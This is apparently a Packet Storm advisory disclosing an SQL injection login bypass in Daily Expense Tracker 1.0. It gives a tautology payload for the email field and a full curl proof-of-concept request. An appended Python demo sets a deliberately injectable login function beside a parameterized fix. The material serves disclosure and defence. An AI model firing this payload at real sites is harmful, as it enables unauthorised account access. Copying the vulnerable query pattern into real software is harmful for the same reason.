Daily Expense Tracker 1.0 SQL Injection

2020-07-20T00:00:00
ID PACKETSTORM:158472
Type packetstorm
Reporter gh1mau
Modified 2020-07-20T00:00:00

Description

                                        
# Exploit Title: Daily Expense Tracker 1.0 - Authentication Bypass  
# Date: 2020-07-20  
# Exploit Author: gh1mau  
# Team Members: Capt'N,muzzo,chaos689 | https://h0fclanmalaysia.wordpress.com/  
# Vendor Homepage: https://phpgurukul.com/daily-expense-tracker-using-php-and-mysql/  
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10013  
# Version: V1.0  
# Tested on: PHP 5.6.18, Apache/2.4.18 (Win32), Ver 14.14 Distrib 5.7.11, for Win32 (AMD64)  
  
  
Vulnerable File:  
----------------   
/index.php  
  
  
Vulnerable Code:  
-----------------  
line 8: $email=$_POST['email'];  
  
  
Vulnerable Issue:  
-----------------  
The value taken by $email=$_POST['email']; is not validated or escaped on the server side before it is used in the login query.  
  
  
Payload:  
--------  
email=saya%40saya.com' or '1'='1'#&password=1234&login=login  
  
  
Sample POC Request:  
-------------------  
  
curl -i -s -k --location --request POST 'http://localhost/dets/' \  
--header 'Origin: http://localhost:88' \  
--header 'Cookie: PHPSESSID=dht4cn59hq6020vulephs36qr5' \  
--header 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \  
--header 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36' \  
--header 'Referer: http://localhost:88/dets/' \  
--header 'Connection: close' \  
--header 'Sec-Fetch-Site: same-origin' \  
--header 'Sec-Fetch-Dest: document' \  
--header 'Host: localhost:88' \  
--header 'Accept-Encoding: gzip, deflate' \  
--header 'Sec-Fetch-Mode: navigate' \  
--header 'Cache-Control: max-age=0' \  
--header 'Upgrade-Insecure-Requests: 1' \  
--header 'Sec-Fetch-User: ?1' \  
--header 'Accept-Language: en-US,en;q=0.9' \  
--header 'Content-Length: 60' \  
--header 'Content-Type: application/x-www-form-urlencoded' \  
--data-raw "email=saya%40saya.com' or '1'='1'#&password=1234&login=login"  
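The defect the advisory describes (the POSTed email spliced straight into the login query) shown beside the parameterized fix, as an added example that is not part of the advisory or of the phpgurukul code. It uses Python with an in-memory SQLite table in place of PHP and MySQL; the table name, column names and password hashing are assumptions. The advisory's payload ends in `#`, which is MySQL comment syntax; SQLite does not treat `#` as a comment, so the constructed input below uses `-- ` for the same tautology-plus-comment shape.

```python
import hashlib
import sqlite3


def hash_pw(password: str) -> str:
    # Assumed hashing scheme. It is irrelevant to the injection, which lives in
    # how the email is placed into the query, not in how the password is stored.
    return hashlib.sha256(password.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    # Constructed user table standing in for the application's MySQL table;
    # the table and column names are assumptions, not the project's schema.
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE tblusers (id INTEGER PRIMARY KEY, email TEXT, password TEXT)"
    )
    conn.execute(
        "INSERT INTO tblusers (email, password) VALUES (?, ?)",
        ("admin@example.com", hash_pw("correct-horse")),
    )
    conn.commit()
    return conn


def vulnerable_login(conn: sqlite3.Connection, email: str, password: str):
    """Mirrors the advisory's defect: the email is formatted into the SQL text,
    so a quote in the input closes the literal and rewrites the WHERE clause."""
    sql = (
        "SELECT email FROM tblusers "
        f"WHERE email='{email}' AND password='{hash_pw(password)}'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def safe_login(conn: sqlite3.Connection, email: str, password: str):
    """Fix: bind the input as a query parameter. The driver passes the value
    separately from the SQL text, so it can never change the query structure."""
    sql = "SELECT email FROM tblusers WHERE email=? AND password=?"
    row = conn.execute(sql, (email, hash_pw(password))).fetchone()
    return row[0] if row else None


def run_demo() -> dict:
    """Runs both versions against an unknown email and against the advisory's
    input shape; returns the matched account (or None) for each case."""
    conn = make_db()
    # Same shape as the advisory's payload: tautology, then a comment that
    # swallows the password check. '-- ' replaces MySQL's '#' for SQLite.
    injected = "saya@saya.com' or '1'='1'-- "
    return {
        "vulnerable_unknown_user": vulnerable_login(conn, "saya@saya.com", "1234"),
        "vulnerable_injected": vulnerable_login(conn, injected, "1234"),
        "safe_injected": safe_login(conn, injected, "1234"),
        "safe_real_user": safe_login(conn, "admin@example.com", "correct-horse"),
    }


if __name__ == "__main__":
    for name, result in run_demo().items():
        print(f"{name}: {result!r}")
```

The vulnerable version logs in as the first stored account for an email that does not exist, while the parameterized version returns nothing for the same input and still accepts the real credentials. In the PHP code the equivalent fix is a mysqli or PDO prepared statement with the email bound as a parameter instead of interpolated into the query string.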